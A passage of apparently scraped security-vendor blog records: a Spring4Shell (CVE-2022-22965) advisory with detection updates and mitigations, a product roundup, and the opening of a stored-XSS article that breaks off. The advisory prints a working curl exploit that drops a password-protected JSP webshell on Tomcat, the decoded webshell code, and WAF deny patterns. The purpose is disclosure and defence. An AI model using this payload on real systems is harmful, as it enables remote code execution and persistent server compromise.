to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --&gt; AppFw --&gt; Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 &amp; 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, &quot;class._&quot;, &quot;Class._&quot;, &quot;_.class._&quot;, and &quot;_.Class._&quot;. These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{&quot;class._&quot;, &quot;Class._&quot;, &quot;_.class._&quot;, &quot;_.Class._&quot;}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --&gt; AppFw --&gt; Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:04:09", "description": "\n\nSummer is in full swing, and that means soaring temperatures, backyard grill-outs, and the latest roundup of Q2 application security improvements from Rapid7. Yes, we know you\u2019ve been waiting for this moment with more anticipation than Season 4 of Stranger Things. So let\u2019s start running up that hill, not beat around the bush (see what we did there?), and dive right in.\n\n## OWASP Top 10 for application security\n\nWay, way back in September of 2021 (it feels like it was yesterday), the Open Web Application Security Project (OWASP) released its [top 10 list of critical web application security risks](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). Naturally, we were all over it, as OWASP is one of the most trusted voices in cybersecurity, and their Top 10 lists are excellent places to start understanding where and how threat actors could be coming for your applications. We released [a ton of material](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>) to help our customers better understand and implement the recommendations from OWASP.\n\nThis quarter, we were able to take those protections another big step forward by providing an [OWASP 2021 Attack Template and Report for InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>). With this new feature, your security team can work closely with development teams to discover and remediate vulnerabilities in ways that jive with security best practice. It also helps to focus your AppSec program around the updated categories provided by OWASP (which we highly suggest you do).\n\nThe new attack template includes all the relevant attacks included in the updated OWASP Top 10 list which means you can focus on the most important vulnerabilities to remediate, rather than be overwhelmed by too many vulnerabilities and not focusing on the right ones. Once the vulns are discovered, [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) helps your development team to remediate the issues in several different ways, including a new OWASP Top 10 report and the ability to let developers confirm vulnerabilities and fixes with Attack Replay.\n\n## Scan engine and attack enhancements\n\nProduct support for OWASP 2021 wasn\u2019t the only improvement we made to our[ industry-leading DAST](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>) this quarter. In fact, we\u2019ve been quite busy adding additional attack coverage and making scan engine improvements to increase coverage and accuracy for our customers. Here are just a few. \n\n### Spring4Shell attacks and protections with InsightAppSec and tCell\n\nWe instituted a pair of improvements to InsightAppSec and [tCell](<https://www.rapid7.com/products/tcell/>) meant to identify and block the now-infamous [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) vulnerability. We now have included a default RCE attack module specifically to test for the Spring4Shell vulnerability with InsightAppSec. That feature is available to all InsightAppSec customers right now, and we highly recommend using it to prevent this major vulnerability from impacting your applications. \n\nAdditionally, for those customers leveraging tCell to protect their apps, we've added new detections and the ability to block Spring4Shell attacks against your web applications. In addition, we've added Spring4Shell coverage for our Runtime SCA capability. Check out [more here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on both of these new enhancements. \n\n### New out-of-band attack module\n\nWe\u2019ve added a new out-of-band SQL injection module similar to Log4Shell, except it leverages the DNS protocol, which is typically less restricted and used by the adversary. It's included in the \"All Attacks\" attack template and can be added to any customer attack template.\n\n### Improved scanning for session detection\n\nWe have made improvements to our scan engine on InsightAppSec to better detect unwanted logouts. When configuring authentication, the step-by-step instructions will guide you through configuring this process for your web applications.\n\n## Making it easier for our customers\n\nThis wouldn\u2019t be a quarterly feature update if we didn\u2019t mention ways we are making InsightAppSec and tCell even easier and more efficient for our customers. In the last few months, we have moved the \"Manage Columns\" function into \"Vulnerabilities\" in InsightAppSec to make it even more customizable. You can now also hide columns, drag and drop them where you would like, and change the order in ways that meet your needs. \n\nWe\u2019ve also released an AWS AMI of the tCell nginx agent to make it easier for current customers to deploy tCell. This is perfect for those who are familiar with AWS and want to get up and running with tCell fast. Customers who also want a basic understanding of how tCell works and want to share tCell\u2019s value with their dev teams will find this new AWS AMI to provide insight fast. \n\nSummer may be a time to take it easy and enjoy the sunshine, but we\u2019re going to be just as hard at work making improvements to InsightAppSec and tCell over the next three months as we were in the last three. With a break for a hot dog and some fireworks in there somewhere. Stay tuned for more from us and have a great summer.\n\n_**Additional reading:**_\n\n * _[Application Security in 2022: Where Are We Now?](<https://www.rapid7.com/blog/post/2022/06/29/application-security-in-2022-where-are-we-now/>)_\n * _[API Security: Best Practices for a Changing Attack Surface](<https://www.rapid7.com/blog/post/2022/06/27/api-security-best-practices-for-a-changing-attack-surface/>)_\n * _[How to Secure App Development in the Cloud, With Tips From Gartner](<https://www.rapid7.com/blog/post/2022/06/22/how-to-secure-app-development-in-the-cloud-with-tips-from-gartner/>)_\n * _[Find, Fix, and Report \u200bOWASP Top 10 Vulnerabilities in InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T15:45:00", "type": "rapid7blog", "title": "It\u2019s the Summer of AppSec: Q2 Improvements to Our Industry-Leading DAST and WAAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-07-13T15:45:00", "id": "RAPID7BLOG:66B9F80A5ED88EFA9D054CBCE8AA19A5", "href": "https://blog.rapid7.com/2022/07/13/its-the-summer-of-appsec-q2-improvements-to-our-industry-leading-dast-and-waap/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T16:01:21", "description": "\n\nI recently wrote a blog post on [injection-type vulnerabilities](<http://rapid7.com/blog/post/2021/10/19/owasp-top-10-deep-dive-injection-and-stack-traces-from-a-hackers-perspective/>) and how they were knocked down a few spots from 1 to 3 on the new [OWASP Top 10 for 2022](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). The main focus of that article was to demonstrate how stack traces could be \u2014 and still are \u2014 used via injection attacks to gather information about an application to further an attacker's goal. In that post, I skimmed over one of my all time favorite types of injections: [cross-site scripting (XSS)](<https://www.rapid7.com/fundamentals/cross-site-scripting/>).\n\nIn this post, I\u2019ll cover this gem of an exploit in much more depth, highlighting how it has managed to adapt to the newer environments of today\u2019s modern web applications, specifically the API and Javascript Object Notation (JSON).\n\nI know the term API is thrown around a lot when referencing web applications these days, but for this post, I will specifically be referencing requests made from the front end of a web application to the back end via ajax (Asynchronous JavaScript and XML) or more modern approaches like the fetch method in JavaScript.\n\nBefore we begin, I'd like to give a quick recap of what XSS is and how a legacy application might handle these types of requests that could trigger XSS, then dive into how XSS still thrives today in modern web applications via the methods mentioned so far.\n\n## What is cross-site scripting?\n\nThere are many types of XSS, but for this post, I\u2019ll only be focusing on persistent XSS, which is sometimes referred to as stored XSS.\n\nXSS is a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to execute malicious code \u2014 generally in the form of a browser-side script like JavaScript, for example \u2014 against an unsuspecting end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application accepts an input from a user without sanitizing, validating, escaping, or encoding it.\n\nBecause the end user\u2019s browser has no way to know not to trust the malicious script, the browser will execute the script. Because of this broken trust, attackers typically leverage these vulnerabilities to steal victims\u2019 cookies, session tokens, or other sensitive information retained by the browser. They could also redirect to other malicious sites, install keyloggers or crypto miners, or even change the content of the website.\n\nNow for the \"stored\" part. As the name implies, stored XSS generally occurs when the malicious payload has been stored on the target server, usually in a database, from input that has been submitted in a message forum, visitor log, comment field, form, or any parameter that lacks proper input sanitization.\n\nWhat makes this type of XSS so much more damaging is that, unlike reflected XSS \u2013 which only affects specific targets via 